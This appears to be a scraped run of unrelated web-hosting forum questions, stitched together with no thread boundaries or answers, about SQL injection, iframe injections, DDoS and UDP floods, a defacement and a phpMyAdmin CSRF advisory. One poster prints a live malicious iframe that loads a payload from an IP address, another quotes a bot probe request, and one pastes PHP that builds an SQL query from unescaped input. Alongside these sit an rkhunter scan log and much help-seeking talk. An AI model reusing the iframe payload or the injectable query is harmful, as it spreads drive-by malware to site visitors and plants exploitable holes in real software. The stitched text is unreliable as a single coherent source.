some body attacking on my server and changing my users profile name /password or any other information so How To Protect MySQL Database From My SQL Injection Attacks? i have dedicate server i provide free wap sites to people with wildcard dns system and i have ConfigServer Security & Firewall installed.
All my sites on both my hosting accounts are infected with an iframe.
At the end of the index.html files the malicious code just appeared...suddenly 3 weeks ago.
The host blamed Joomla so I took the appropriate steps:
Upgraded my Joomla to the latest version, changed the whole account username and password, changed the configuration and template to unwriteable.
It stopped the injection for a few days but then it came back. I would also like to add that 2 other sites on my account, one simple index.html file and an old website I have that is totally HTML with nothing to do with Joomla also got infected.
The iframe also infected a Drupal install I did as a test.
So according to these fact is this a Hosting Company not taking responsibility or can a Joomla site infected spread to other normal HTML sites and different CMS's on the server?
This situation is ruinning me and I strongly suspect it's a Hosting problem and not Joomla.
Any expert opinions from true professionals would be appreciated because if I can prove that it's not a Joomla issue I might take legal action against the hosting company since this has cost me dozens of hours of work and several hundred dollars of lost revenue.
I am attaching the iframe exploit. It installs itself on every index file...in every folder - components, mambots, ect..additionally it attaches itself on any and every kind of addon that has an index.html file.
I have searched for prevention methods and explanations on what DoS's and DDoS's are capable of. I was hoping someone could shed some light on free alternatives that would help reduce these attacks or help to make me aware if one were to occur.
Linux Distro: CentOS 5.3
I am not running apache or any web related services on my machine.
I run a dedicated server for the sole purpose of hosting a few game servers. I have already contacted my provider and they offered a $599 /mo plan for prevention. This is unreasonable and I simply cannot afford it. I have been threatened with a DDoS because one of my administrators banned a player constantly creating drama, stress, and breaking rules.
I simply cannot afford a gigantic bandwidth bill and this scare tactic has made me a little weary. Is there anything I can do to reduce the damage?
I would like to know what are the best ways in preventing a UDP D/DoS Attack. DDoS-Deflate and most programs like that are just for TCP connections, and most of the time only for port 80. What is the best option out there for protection (linux wise) for UDP attacks. I was using shorewall before but it did not do so well so I just switched now to CSF [url] with WebMin and seems to be working ok. Even though thoes are both firewalls, they seem to have some protection against UDP Attacks. Please note this is a server that just hosts some game servers, no webhosting. What would be my best option here?
My host has told me that my forum is coming under a DDOS attack. Once was on Friday March 20th and again today (monday march 23). Before those two, there are attacks almost every week, sometimes twice a week.
The host installed DoS-Deflate. It started blocking legitimate traffic and had to be removed.
The operating system is Linux CentOS, the forum software is VBulletin. The server is a VPS with 1 gig of memory.
Besides DoS-Deflate, what other options are out there?
one of my clients seems to be attracting unwanted attention, it seems as if bots or something along those lines are attempting to exploit my box, while they are unsuccessful it would seem. I was wdonering if there was a rule I could put in Mod_Security that would ban them for attempting to
GET "/awstatsf/logger.php?action=log&type=Hybrid&host=hacked101&"
I recently initiated "Hot Link Prevention" on one of my web sites on my Dedicated server (via CPanel). It woks well in re-directing hotlinked images to a small image that says "Unauthorized Hotlink Image." This of course prevents other web sites from leaching my bandwidth. However, I have had a number of people complain that when they visit my forum, they don't get my site's images, but instead see the Unauthorized Hotlink Image. The common thread seems to be the people with the problem are using Security Software. In one case, a guy is using Norton Confidential. Another guy is using some Security software provided by his ISP. I'm guessing that this security software is somehow messing with the Referer in tehir browser and confusing my server into thinking the images are being hotlinked from some other site. Short of turning off Hot Link Prevention, does anyone have any suggestions to tell the folks...are there settings in their Security Software for example that will prevent the problem when they visit my site?
Yesterday it was discovered that a website had most or all of the html pages compromised with some sort of iframe injection. Every page had an iframe line added to the bottom that attempted to load something from another website. It was coming from a domain called reycross.net and was attempting to load the html/framer virus into the visitor's computer.
The problem is that I cannot identify how the injection hit the system. Here are the facts I can provide...
1. The server does NOT have Joomla or Wordpress.
2. The injection seemed to hit every html page whether the page was active on the site or not.
3. The injection hit only one account.
I have checked /var/log/messages and /var/log/secure and find nothing.
What I don't have is proper ftp logging to determine whether the injection came from that method.
Additional notes: Shortly before the injection took place the box was updated to the latest version of cpanel. Also php was upgraded to 5.2.10. At the time suPHP was enabled but unfortunately had to be disabled because it created problems with another site. Prior to this suPHP was disabled as well.
I went through and removed all instances of this iframe injection and ran another update of cpanel. I also recompiled apache/php and went back to 5.2.8 in case the problem was php related.
Anyone using phpMyAdmin for MySQL admin, you need to know about a newly discovered attack vector.
Here's the official announcement: [url]
The key to this is in their description, "A logged-in user can be subject of SQL injection through cross site request forgery. Several scripts in phpMyAdmin are vulnerable and the attack can be made through table parameter."
A logged in user... This attack is a combination of SQL injection through CSRF. In other words, you'd have to be logged into your phpMyAdmin program, hit a website setup for CSRF, and then the attacker could have access to your phpMyAdmin as you.
If there's interest here, I could write up a detailed description of CSRF and how to prevent this type of attack.
Just let me know...
You should upgrade immediately to either phpMyAdmin 2.9.11.4 or 3.1.1.0 or apply patch 12100.
I had done a program in early 2006 for a site in php-mysql. At the time of doing the code, The code written was not so standard and it contained uninitialized variables used for include file paths (eventhough values are assigned to it before using) and the "sess" folder was created within the website folder. Also the parameters for the SQL query were not escaped, but everything was working fine.
And now i was informed that the insecure code in my program caused the server crash and i have to pay the penalty for the same. Can anyone let me know whether the below code / keeping the session variables within a folder inside the /www/ will make the sites hosted on the server where this program runs to stop/crash for ever ?
------------------------------------------------------------------ function update_region($id,$regname,$regcom) { $query = "UPDATE taxregion_mast SET taxregion_name = '". $regname."', region_comments = '". $regcom."' WHERE region_id =" .$id; mysql_query($query);
Does CISCO ASA Firewall block SQL and XSS Injection? If not, then which are the firewalls available which do this job. I have checked web application firewalls and found them to be too costly for my budget. What are the other cheap options available?
I have a major problem with injecting iframes into every files (header.php footer.php index.php login.php and vars.php ) on all server account.
Code: <iframe src='h t t p : / / 8 1 . 9 5 . 1 4 5 . 2 4 0 / g o . p h p ? s i d = 1' style='border:0px solid gray;' WIDTH=0 HEIGHT=0 FRAMEBORDER=0 MARGINWIDTH=0 MARGINHEIGHT=0 SCROLLING=no></iframe> what is the reason and how to fix that ?
and I have the second problem is the rkhunter warnings I am not sure if that have relations with the first problem : rkhunter results:
Code: Checking system commands...
Performing 'strings' command checks Checking 'strings' command [ OK ]
Performing 'shared libraries' checks Checking for preloading variables [ None found ] Checking for preload file [ Not found ] Checking LD_LIBRARY_PATH variable [ Not found ]
Performing file properties checks Checking for prerequisites [ Warning ] /bin/awk [ OK ] /bin/basename [ OK ] /bin/bash [ OK ] /bin/cat [ OK ] /bin/chmod [ OK ] /bin/chown [ OK ] /bin/cp [ OK ] /bin/csh [ OK ] /bin/cut [ OK ] /bin/date [ OK ] /bin/df [ OK ] /bin/dmesg [ OK ] /bin/echo [ OK ] /bin/ed [ OK ] /bin/egrep [ OK ] /bin/env [ OK ] /bin/fgrep [ OK ] /bin/grep [ OK ] /bin/kill [ OK ] /bin/login [ OK ] /bin/ls [ OK ] /bin/mail [ OK ] /bin/mktemp [ OK ] /bin/more [ OK ] /bin/mount [ OK ] /bin/mv [ OK ] /bin/netstat [ OK ] /bin/passwd [ OK ] /bin/ps [ OK ] /bin/pwd [ OK ] /bin/rpm [ OK ] /bin/sed [ OK ] /bin/sh [ OK ] /bin/sort [ OK ] /bin/su [ OK ] /bin/touch [ OK ] /bin/uname [ OK ] /bin/gawk [ OK ] /bin/tcsh [ OK ] /usr/bin/awk [ OK ] /usr/bin/chattr [ OK ] /usr/bin/curl [ OK ] /usr/bin/cut [ OK ] /usr/bin/diff [ OK ] /usr/bin/dirname [ OK ] /usr/bin/du [ OK ] /usr/bin/env [ OK ] /usr/bin/file [ OK ] /usr/bin/find [ OK ] /usr/bin/GET [ Warning ] /usr/bin/groups [ Warning ] /usr/bin/head [ OK ] /usr/bin/id [ OK ] /usr/bin/kill [ OK ] /usr/bin/killall [ OK ] /usr/bin/last [ OK ] /usr/bin/lastlog [ OK ] /usr/bin/ldd [ Warning ] /usr/bin/less [ OK ] /usr/bin/locate [ OK ] /usr/bin/logger [ OK ] /usr/bin/lsattr [ OK ] /usr/bin/lynx [ OK ] /usr/bin/md5sum [ OK ] /usr/bin/newgrp [ OK ] /usr/bin/passwd [ OK ] /usr/bin/perl [ OK ] /usr/bin/pstree [ OK ] /usr/bin/readlink [ OK ] /usr/bin/runcon [ OK ] /usr/bin/sha1sum [ OK ] /usr/bin/size [ OK ] /usr/bin/slocate [ OK ] /usr/bin/stat [ OK ] /usr/bin/strace [ OK ] /usr/bin/strings [ OK ] /usr/bin/sudo [ OK ] /usr/bin/tail [ OK ] /usr/bin/test [ OK ] /usr/bin/top [ OK ] /usr/bin/tr [ OK ] /usr/bin/uniq [ OK ] /usr/bin/users [ OK ] /usr/bin/vmstat [ OK ] /usr/bin/w [ OK ] /usr/bin/watch [ OK ] /usr/bin/wc [ OK ] /usr/bin/wget [ OK ] /usr/bin/whatis [ Warning ] /usr/bin/whereis [ OK ] /usr/bin/which [ OK ] /usr/bin/who [ OK ] /usr/bin/whoami [ OK ] /usr/bin/gawk [ OK ] /sbin/chkconfig [ OK ] /sbin/depmod [ OK ] /sbin/ifconfig [ OK ] /sbin/ifdown [ Warning ] /sbin/ifup [ Warning ] /sbin/init [ OK ] /sbin/insmod [ OK ] /sbin/ip [ OK ] /sbin/lsmod [ OK ] /sbin/modinfo [ OK ] /sbin/modprobe [ OK ] /sbin/nologin [ OK ] /sbin/rmmod [ OK ] /sbin/runlevel [ OK ] /sbin/sulogin [ OK ] /sbin/sysctl [ OK ] /sbin/syslogd [ OK ] /usr/sbin/adduser [ OK ] /usr/sbin/chroot [ OK ] /usr/sbin/groupadd [ OK ] /usr/sbin/groupdel [ OK ] /usr/sbin/groupmod [ OK ] /usr/sbin/grpck [ OK ] /usr/sbin/kudzu [ OK ] /usr/sbin/lsof [ OK ] /usr/sbin/prelink [ OK ] /usr/sbin/pwck [ OK ] /usr/sbin/tcpd [ OK ] /usr/sbin/useradd [ OK ] /usr/sbin/userdel [ OK ] /usr/sbin/usermod [ OK ] /usr/sbin/vipw [ OK ] /usr/sbin/xinetd [ OK ] /usr/local/bin/perl [ OK ] /usr/local/bin/rkhunter [ OK ]
Checking for rootkits...
Performing check of known rootkit files and directories 55808 Trojan - Variant A [ Not found ] ADM Worm [ Not found ] AjaKit Rootkit [ Not found ] aPa Kit [ Not found ] Apache Worm [ Not found ] Ambient (ark) Rootkit [ Not found ] Balaur Rootkit [ Not found ] BeastKit Rootkit [ Not found ] beX2 Rootkit [ Not found ] BOBKit Rootkit [ Not found ] CiNIK Worm (Slapper.B variant) [ Not found ] Danny-Boy's Abuse Kit [ Not found ] Devil RootKit [ Not found ] Dica-Kit Rootkit [ Not found ] Dreams Rootkit [ Not found ] Duarawkz Rootkit [ Not found ] Enye LKM [ Not found ] Flea Linux Rootkit [ Not found ] FreeBSD Rootkit [ Not found ] ****`it Rootkit [ Not found ] GasKit Rootkit [ Not found ] Heroin LKM [ Not found ] HjC Kit [ Not found ] ignoKit Rootkit [ Not found ] ImperalsS-FBRK Rootkit [ Not found ] Irix Rootkit [ Not found ] Kitko Rootkit [ Not found ] Knark Rootkit [ Not found ] Li0n Worm [ Not found ] Lockit / LJK2 Rootkit [ Not found ] Mood-NT Rootkit [ Not found ] MRK Rootkit [ Not found ] Ni0 Rootkit [ Not found ] Ohhara Rootkit [ Not found ] Optic Kit (Tux) Worm [ Not found ] Oz Rootkit [ Not found ] Phalanx Rootkit [ Not found ] Phalanx Rootkit (strings) [ Not found ] Portacelo Rootkit [ Not found ] R3dstorm Toolkit [ Not found ] RH-Sharpe's Rootkit [ Not found ] RSHA's Rootkit [ Not found ] Scalper Worm [ Not found ] Sebek LKM [ Not found ] Shutdown Rootkit [ Not found ] SHV4 Rootkit [ Not found ] SHV5 Rootkit [ Not found ] Sin Rootkit [ Not found ] Slapper Worm [ Not found ] Sneakin Rootkit [ Not found ] Suckit Rootkit [ Not found ] SunOS Rootkit [ Not found ] SunOS / NSDAP Rootkit [ Not found ] Superkit Rootkit [ Not found ] TBD (Telnet BackDoor) [ Not found ] TeLeKiT Rootkit [ Not found ] T0rn Rootkit [ Not found ] Trojanit Kit [ Not found ] Tuxtendo Rootkit [ Not found ] URK Rootkit [ Not found ] VcKit Rootkit [ Not found ] Volc Rootkit [ Not found ] X-Org SunOS Rootkit [ Not found ] zaRwT.KiT Rootkit [ Not found ]
Performing additional rootkit checks Suckit Rookit additional checks [ OK ] Checking for possible rootkit files and directories [ None found ] Checking for possible rootkit strings [ None found ]
Performing malware checks Checking running processes for suspicious files [ None found ] Checking for login backdoors [ None found ] Checking for suspicious directories [ None found ] Checking for sniffer log files [ None found ]
Performing trojan specific checks Checking for enabled xinetd services [ None found ] Checking for Apache backdoor [ Not found ]
Performing Linux specific checks Checking kernel module commands [ OK ] Checking kernel module names [ OK ] Checking the network...
Performing check for backdoor ports Checking for UDP port 2001 [ Not found ] Checking for TCP port 2006 [ Not found ] Checking for TCP port 2128 [ Not found ] Checking for TCP port 14856 [ Not found ] Checking for TCP port 47107 [ Not found ] Checking for TCP port 60922 [ Not found ]
Performing checks on the network interfaces Checking for promiscuous interfaces [ None found ]
Checking the local host...
Performing system boot checks Checking for local host name [ Found ] Checking for local startup files [ Found ] Checking local startup files for malware [ None found ] Checking system startup files for malware [ None found ]
Performing group and account checks Checking for passwd file [ Found ] Checking for root equivalent (UID 0) accounts [ None found ] Checking for passwordless accounts [ None found ] Checking for passwd file changes [ None found ] Checking for group file changes [ None found ] Checking root account shell history files [ OK ]
Performing system configuration file checks Checking for SSH configuration file [ Found ] Checking if SSH root access is allowed [ Warning ] Checking if SSH protocol v1 is allowed [ Warning ] Checking for running syslog daemon [ Found ] Checking for syslog configuration file [ Found ] Checking if syslog remote logging is allowed [ Not allowed ]
Performing filesystem checks Checking /dev for suspicious file types [ None found ] Checking for hidden files and directories [ Warning ] Checking application versions...
Checking version of Exim MTA [ OK ] Checking version of GnuPG [ Warning ] Checking version of Apache [ Skipped ] Checking version of Bind DNS [ OK ] Checking version of OpenSSL [ Warning ] Checking version of PHP [ OK ] Checking version of Procmail MTA [ OK ] Checking version of OpenSSH [ OK ]
I'm getting DoS attacks on my new dedicated server and I've had about 600 emails from my server about IP bannings. I can't even access my server via WHM at all at the moment! The sites are still online and the server is up but I can't log into WHM. What can I do to remedy this?
Also I can't quite understand why anyone would conduct a DoS attack in the first place...
I have a VPS that's on the awknet network and I'm receiving DNS DDoS and I don't think they have anything to stop these attacks, how can I prevent these?
I seem to be getting a lot of mail attacks to accounts located on the server. However, most of the email addresses do not exist and therefore the emails are bouncing back and getting stuck in my mail queue manager. There are something like 20 emails per minute getting stacked up in there and it is causing a massive load on the server.
my webserver defaced with this persons name all over my site.
I was reading and it said JaMaYcKa does this things through a cPanel bug.
Apparently our entire host has been hacked too. I'm very dissapointed as I was on the verge of starting one of my most biggest projects and now it's gone. :'(
one of my costumers server is getting ddos attacks. I solved syn and get attacks with litespeed web server but I have another problem. They started to do udp flood. I m losing connection to my server. I bought new server with 1 gbit port for solving it.